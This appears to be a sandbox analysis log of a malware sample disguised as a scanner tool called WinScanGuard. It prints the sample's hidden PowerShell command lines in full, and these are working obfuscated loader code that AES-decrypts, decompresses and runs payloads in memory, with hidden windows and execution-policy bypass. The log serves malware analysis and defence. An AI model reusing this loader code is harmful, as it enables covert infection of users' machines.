'')('rzns/opkxzu99whpuauc1mhvovucskwdcrfz1flzhkq9vipchxwbsxtn8ebodaixzcvikg7knsnjqfjixs10dgpnp1rgmfss0ufgfy1hhpebrscxylrfwuglvdikxksncnlet01zqtp7t1afzszuifryhdaonnd/a48fsobov6s0dg4uz6it5eohk560k0okdqhofxejn4remuw/qa+ofghhvk0nkszmziwificol824a/ijhuaivvnxisy3kfqxbk9sxrwii48yb3r5ehdu2sfoodwj4/p9sudfwqjtgeixdzh4kvsxjz0xve4zypd+he6+n8ebmzvscb8hkun/+dzmxufdtfwwv5marcy6zdmo2yj4s2sbozzspvxkuwpa7yffsyhuzq4rpk9yysf5mqw
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\$sxr-powershell.exe "c:\windows\$sxr-powershell.exe" -nologo -noprofile -noninteractive -windowstyle hidden -executionpolicy bypass -command [system.diagnostics.process]::getprocessbyid(5088).waitforexit();[system.threading.thread]::sleep(5000); function zxowg($ygfcs){ $hjbvm=[system.security.cryptography.aes]::create(); $hjbvm.mode=[system.security.cryptography.ciphermode]::cbc; $hjbvm.padding=[system.security.cryptography.paddingmode]::pkcs7; $hjbvm.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('jr/er/s13sxmxzdcdq4cx+zlfjubr/t1zoygzlvi3nc='); $hjbvm.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rigepzaiqqvktp3vmkz42w=='); $shnyr=$hjbvm.('rotpyrcedetaerc'[-1..-15] -join '')(); $ptorz=$shnyr.('kcolblanifmrofsnart'[-1..-19] -join '')($ygfcs, 0, $ygfcs.length); $shnyr.dispose(); $hjbvm.dispose(); $ptorz;}function miajr($ygfcs){ $vhzij=new-object system.io.memorystream(,$ygfcs); $mkycr=new-object system.io.memorystream; $pphyy=new-object system.io.compression.gzipstream($vhzij, [io.compression.compressionmode]::decompress); $pphyy.copyto($mkycr); $pphyy.dispose(); $vhzij.dispose(); $mkycr.dispose(); $mkycr.toarray();}function dettm($ygfcs,$ztwie){ $mzolj=[system.reflection.assembly]::load([byte[]]$ygfcs); $lofyp=$mzolj.entrypoint; $lofyp.invoke($null, $ztwie);}$hjbvm1 = new-object system.security.cryptography.aesmanaged;$hjbvm1.mode = [system.security.cryptography.ciphermode]::cbc;$hjbvm1.padding = [system.security.cryptography.paddingmode]::pkcs7;$hjbvm1.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('jr/er/s13sxmxzdcdq4cx+zlfjubr/t1zoygzlvi3nc=');$hjbvm1.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rigepzaiqqvktp3vmkz42w==');$ghtel = $hjbvm1.('rotpyrcedetaerc'[-1..-15] -join '')();$tsruf = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('/drqfgtkhdxyibtyp3tlyq==');$tsruf = $ghtel.('kcolblanifmrofsnart'[-1..-19] -join '')($tsruf, 0, $tsruf.length);$tsruf = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($tsruf);$tbgvf = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('uyheuy/+hnwqeclfyb1fduqtqym+nhvdwwfjekkh6lu=');$tbgvf = $ghtel.('kcolblanifmrofsnart'[-1..-19] -join '')($tbgvf, 0, $tbgvf.length);$tbgvf = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($tbgvf);$mjwsq = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('v2s4nwnxvxtvxwhesswniq==');$mjwsq = $ghtel.('kcolblanifmrofsnart'[-1..-19] -join '')($mjwsq, 0, $mjwsq.length);$mjwsq = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($mjwsq);$ibfkh = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rzns/opkxzu99whpuauc1mhvovucskwdcrfz1flzhkq9vipchxwbsxtn8ebodaixzcvikg7knsnjqfjixs10dgpnp1rgmfss0ufgfy1hhpebrscxylrfwuglvdikxksncnlet01zqtp7t1afzszuifryhdaonnd/a48fsobov6s0dg4uz6it5eohk560k0okdqhofxejn4remuw/qa+ofghhvk0nkszmziwificol824a/ijhuaivvnxisy3kfqxbk9sxrwii48yb3r5ehdu2sfoodwj4/p9sudfwqjtgeixd
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe "winscanguard_v.2.1.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function olsgt($qhqwz){ $fhdgh=[system.security.cryptography.aes]::create(); $fhdgh.mode=[system.security.cryptography.ciphermode]::cbc; $fhdgh.padding=[system.security.cryptography.paddingmode]::pkcs7; $fhdgh.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('onjsi5fjjzv4aoembvugvr4ituuvmgvnrnjejyrp0wq='); $fhdgh.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('clqnywl0vsdfd4x+5ykrxq=='); $spflb=$fhdgh.createdecryptor(); $return_var=$spflb.transformfinalblock($qhqwz, 0, $qhqwz.length); $spflb.dispose(); $fhdgh.dispose(); $return_var;}function rnhms($qhqwz){ $wxvgk=new-object system.io.memorystream(,$qhqwz); $bpcbe=new-object system.io.memorystream; $couvu=new-object system.io.compression.gzipstream($wxvgk, [io.compression.compressionmode]::decompress); $couvu.copyto($bpcbe); $couvu.dispose(); $wxvgk.dispose(); $bpcbe.dispose(); $bpcbe.toarray();}function zatie($qhqwz,$cjuqy){ $ospmd=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$qhqwz); $xwtdt=$ospmd.entrypoint; $xwtdt.invoke($null, $cjuqy);}$ylwdr=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\desktop\winscanguard_v.2.1.bat').split([environment]::newline);foreach ($xuiqg in $ylwdr) { if ($xuiqg.startswith('seroxen')) { $sogsv=$xuiqg.substring(7); break; }}$zermu=[string[]]$sogsv.split('\');$tzgbc=rnhms (olsgt ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($zermu[0])));$ttdxt=rnhms (olsgt ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($zermu[1])));zatie $ttdxt (,[string[]] ('', 'idtznccsreqaeejvuwzutuitglivmfheulstnnuhslwymmxaqk', 'lkizmjcsatthedeyossawnzmofyqejpcytnoxqiuoblpdohijn'));zatie $tzgbc (,[string[]] ('', 'idtznccsreqaeejvuwzutuitglivmfheulstnnuhslwymmxaqk', 'lkizmjcsatthedeyossawnzmofyqejpcytnoxqiuoblpdohijn'));Jump to behavior
              Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\$sxr-powershell.exe c:\windows\$sxr-powershell.exe -nologo -noprofile -noninteractive -windowstyle hidden -executionpolicy bypass -command function zxowg($ygfcs){ $hjbvm=[system.security.cryptography.aes]::create(); $hjbvm.mode=[system.security.cryptography.ciphermode]::cbc; $hjbvm.padding=[system.security.cryptography.paddingmode]::pkcs7; $hjbvm.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('jr/er/s13sxmxzdcdq4cx+zlfjubr/t1zoygzlvi3nc='); $hjbvm.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rigepzaiqqvktp3vmkz42w=='); $shnyr=$hjbvm.('rotpyrcedetaerc'[-1..-15] -join '')(); $ptorz=$shnyr.('kcolblanifmrofsnart'[-1..-19] -join '')($ygfcs, 0, $ygfcs.length); $shnyr.dispose(); $hjbvm.dispose(); $ptorz;}function miajr($ygfcs){ $vhzij=new-object system.io.memorystream(,$ygfcs); $mkycr=new-object system.io.memorystream; $pphyy=new-object system.io.compression.gzipstream($vhzij, [io.compression.compressionmode]::decompress); $pphyy.copyto($mkycr); $pphyy.dispose(); $vhzij.dispose(); $mkycr.dispose(); $mkycr.toarray();}function dettm($ygfcs,$ztwie){ $mzolj=[system.reflection.assembly]::load([byte[]]$ygfcs); $lofyp=$mzolj.entrypoint; $lofyp.invoke($null, $ztwie);}$hjbvm1 = new-object system.security.cryptography.aesmanaged;$hjbvm1.mode = [system.security.cryptography.ciphermode]::cbc;$hjbvm1.padding = [system.security.cryptography.paddingmode]::pkcs7;$hjbvm1.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('jr/er/s13sxmxzdcdq4cx+zlfjubr/t1zoygzlvi3nc=');$hjbvm1.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rigepzaiqqvktp3vmkz42w==');$ghtel = $hjbvm1.('rotpyrcedetaerc'[-1..-15] -join '')();$tsruf = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('/drqfgtkhdxyibtyp3tlyq==');$tsruf = $ghtel.('kcolblanifmrofsnart'[-1..-19] -join '')($tsruf, 0, $tsruf.length);$tsruf = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($tsruf);$tbgvf = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('uyheuy/+hnwqeclfyb1fduqtqym+nhvdwwfjekkh6lu=');$tbgvf = $ghtel.('kcolblanifmrofsnart'[-1..-19] -join '')($tbgvf, 0, $tbgvf.length);$tbgvf = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($tbgvf);$mjwsq = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('v2s4nwnxvxtvxwhesswniq==');$mjwsq = $ghtel.('kcolblanifmrofsnart'[-1..-19] -join '')($mjwsq, 0, $mjwsq.length);$mjwsq = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($mjwsq);$ibfkh = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rzns/opkxzu99whpuauc1mhvovucskwdcrfz1flzhkq9vipchxwbsxtn8ebodaixzcvikg7knsnjqfjixs10dgpnp1rgmfss0ufgfy1hhpebrscxylrfwuglvdikxksncnlet01zqtp7t1afzszuifryhdaonnd/a48fsobov6s0dg4uz6it5eohk560k0okdqhofxejn4remuw/qa+ofghhvk0nkszmziwificol824a/ijhuaivvnxisy3kfqxbk9sxrwii48yb3r5ehdu2sfoodwj4/p9sudfwqjtgeixdzh4kvsxjz0xve4zypd+he6+n8ebmzvscb8hkun/+dzmxufdtfwwv5marcy6zdmo2yj4s2sbozzspvxkuwpa7yffsyhuzq4rpk9yysf5mqwJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\$sxr-powershell.exe "c:\windows\$sxr-powershell.exe" -nologo -noprofile -noninteractive -windowstyle hidden -executionpolicy bypass -command [system.diagnostics.process]::getprocessbyid(5088).waitforexit();[system.threading.thread]::sleep(5000); function zxowg($ygfcs){ $hjbvm=[system.security.cryptography.aes]::create(); $hjbvm.mode=[system.security.cryptography.ciphermode]::cbc; $hjbvm.padding=[system.security.cryptography.paddingmode]::pkcs7; $hjbvm.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('jr/er/s13sxmxzdcdq4cx+zlfjubr/t1zoygzlvi3nc='); $hjbvm.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rigepzaiqqvktp3vmkz42w=='); $shnyr=$hjbvm.('rotpyrcedetaerc'[-1..-15] -join '')(); $ptorz=$shnyr.('kcolblanifmrofsnart'[-1..-19] -join '')($ygfcs, 0, $ygfcs.length); $shnyr.dispose(); $hjbvm.dispose(); $ptorz;}function miajr($ygfcs){ $vhzij=new-object system.io.memorystream(,$ygfcs); $mkycr=new-object system.io.memorystream; $pphyy=new-object system.io.compression.gzipstream($vhzij, [io.compression.compressionmode]::decompress); $pphyy.copyto($mkycr); $pphyy.dispose(); $vhzij.dispose(); $mkycr.dispose(); $mkycr.toarray();}function dettm($ygfcs,$ztwie){ $mzolj=[system.reflection.assembly]::load([byte[]]$ygfcs); $lofyp=$mzolj.entrypoint; $lofyp.invoke($null, $ztwie);}$hjbvm1 = new-object system.security.cryptography.aesmanaged;$hjbvm1.mode = [system.security.cryptography.ciphermode]::cbc;$hjbvm1.padding = [system.security.cryptography.paddingmode]::pkcs7;$hjbvm1.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('jr/er/s13sxmxzdcdq4cx+zlfjubr/t1zoygzlvi3nc=');$hjbvm1.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rigepzaiqqvktp3vmkz42w==');$ghtel = $hjbvm1.('rotpyrcedetaerc'[-1..-15] -join '')();$tsruf = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('/drqfgtkhdxyibtyp3tlyq==');$tsruf = $ghtel.('kcolblanifmrofsnart'[-1..-19] -join '')($tsruf, 0, $tsruf.length);$tsruf = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($tsruf);$tbgvf = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('uyheuy/+hnwqeclfyb1fduqtqym+nhvdwwfjekkh6lu=');$tbgvf = $ghtel.('kcolblanifmrofsnart'[-1..-19] -join '')($tbgvf, 0, $tbgvf.length);$tbgvf = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($tbgvf);$mjwsq = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('v2s4nwnxvxtvxwhesswniq==');$mjwsq = $ghtel.('kcolblanifmrofsnart'[-1..-19] -join '')($mjwsq, 0, $mjwsq.length);$mjwsq = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($mjwsq);$ibfkh = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rzns/opkxzu99whpuauc1mhvovucskwdcrfz1flzhkq9vipchxwbsxtn8ebodaixzcvikg7knsnjqfjixs10dgpnp1rgmfss0ufgfy1hhpebrscxylrfwuglvdikxksncnlet01zqtp7t1afzszuifryhdaonnd/a48fsobov6s0dg4uz6it5eohk560k0okdqhofxejn4remuw/qa+ofghhvk0nkszmziwificol824a/ijhuaivvnxisy3kfqxbk9sxrwii48yb3r5ehdu2sfoodwj4/p9sudfwqjtgeixdJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe "WinScanGuard_v.2.1.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function oLSgt($QHQwZ){ $FhDgh=[System.Security.Cryptography.Aes]::Create(); $FhDgh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FhDgh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FhDgh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ONJSi5FjJzv4AOEMBvugvr4ituUVmgVNRnjeJyrP0WQ='); $FhDgh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CLQNYwl0vsdfD4X+5YKrxQ=='); $SpFlB=$FhDgh.CreateDecryptor(); $return_var=$SpFlB.TransformFinalBlock($QHQwZ, 0, $QHQwZ.Length); $SpFlB.Dispose(); $FhDgh.Dispose(); $return_var;}function rnHmS($QHQwZ){ $WxVgK=New-Object System.IO.MemoryStream(,$QHQwZ); $bpCBe=New-Object System.IO.MemoryStream; $coUVU=New-Object System.IO.Compression.GZipStream($WxVgK, [IO.Compression.CompressionMode]::Decompress); $coUVU.CopyTo($bpCBe); $coUVU.Dispose(); $WxVgK.Dispose(); $bpCBe.Dispose(); $bpCBe.ToArray();}function ZAtIe($QHQwZ,$cjUqy){ $oSPmD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$QHQwZ); $xWTDt=$oSPmD.EntryPoint; $xWTDt.Invoke($null, $cjUqy);}$YlWDR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\WinScanGuard_v.2.1.bat').Split([Environment]::NewLine);foreach ($XUIQg in $YlWDR) { if ($XUIQg.StartsWith('SEROXEN')) { $sOgSv=$XUIQg.Substring(7); break; }}$ZErMU=[string[]]$sOgSv.Split('\');$tzgBc=rnHmS (oLSgt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZErMU[0])));$TtDxt=rnHmS (oLSgt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZErMU[1])));ZAtIe $TtDxt (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));ZAtIe $tzgBc (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{17980c38-011a-4e2a-a8da-a3b9e80db269}Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{6ee5d1df-df32-414a-8053-43a03a04def5}Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{b60ad232-6d40-4822-9220-52a4d3050cb3}Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{603825cb-58d6-4ab4-99a0-2fdb5cd309d6}Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\$sxr-mshta.exeProcess created: C:\Windows\$sxr-cmd.exe "C:\Windows\$sxr-cmd.exe" /c %$sxr-bWTLJBKbogHiYUerhoAr4312:&#<?=%Jump to behavior
              Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdZH4kVSXjz0XVe4ZYpD+he6+N8ebMZVScb8HKUN/+DzmXUfDtfwWV5MarCY6ZdmO2yJ4s2sbOzZsPvxKUwPa7yfFsYHuzQ4rPk9Yysf5MqWJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{d814285b-904f-4c3a-8cab-4579f96b72d9}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{f835588e-a1ef-4d6b-bc1e-b44ddb22d787}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\$sxr-powershell.exe "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5088).WaitForExit();[System.Threading.Thread]::Sleep(5000); function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ee0091e4-9e0c-4ff3-b26f-57d4a238bd7c}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{f5381469-1700-4694-82dd-1722ad94b3e0}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{f78b27af-93da-4459-95e7-4c5d26a44dc8}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{85d85a52-fed6-47b1-b615-c3a69ff1ad14}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{8c0bd129-911b-4af2-a0bc-93995d45cd5f}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{0979c3ff-3e63-4ea9-9d2b-0e24c33cbca9}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{59453cd9-80c7-4c7f-84ca-38ec20f032b9}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8b9e4941-156b-4561-b75c-88dc752d3d8b}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{da1a065e-b06d-4c17-9fd5-69413fe213f9}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{2c62f067-a6a0-49cc-8f1a-bf6b18a4e5be}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_00401BC6 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,23_2_00401BC6
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_00401BC6 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,23_2_00401BC6
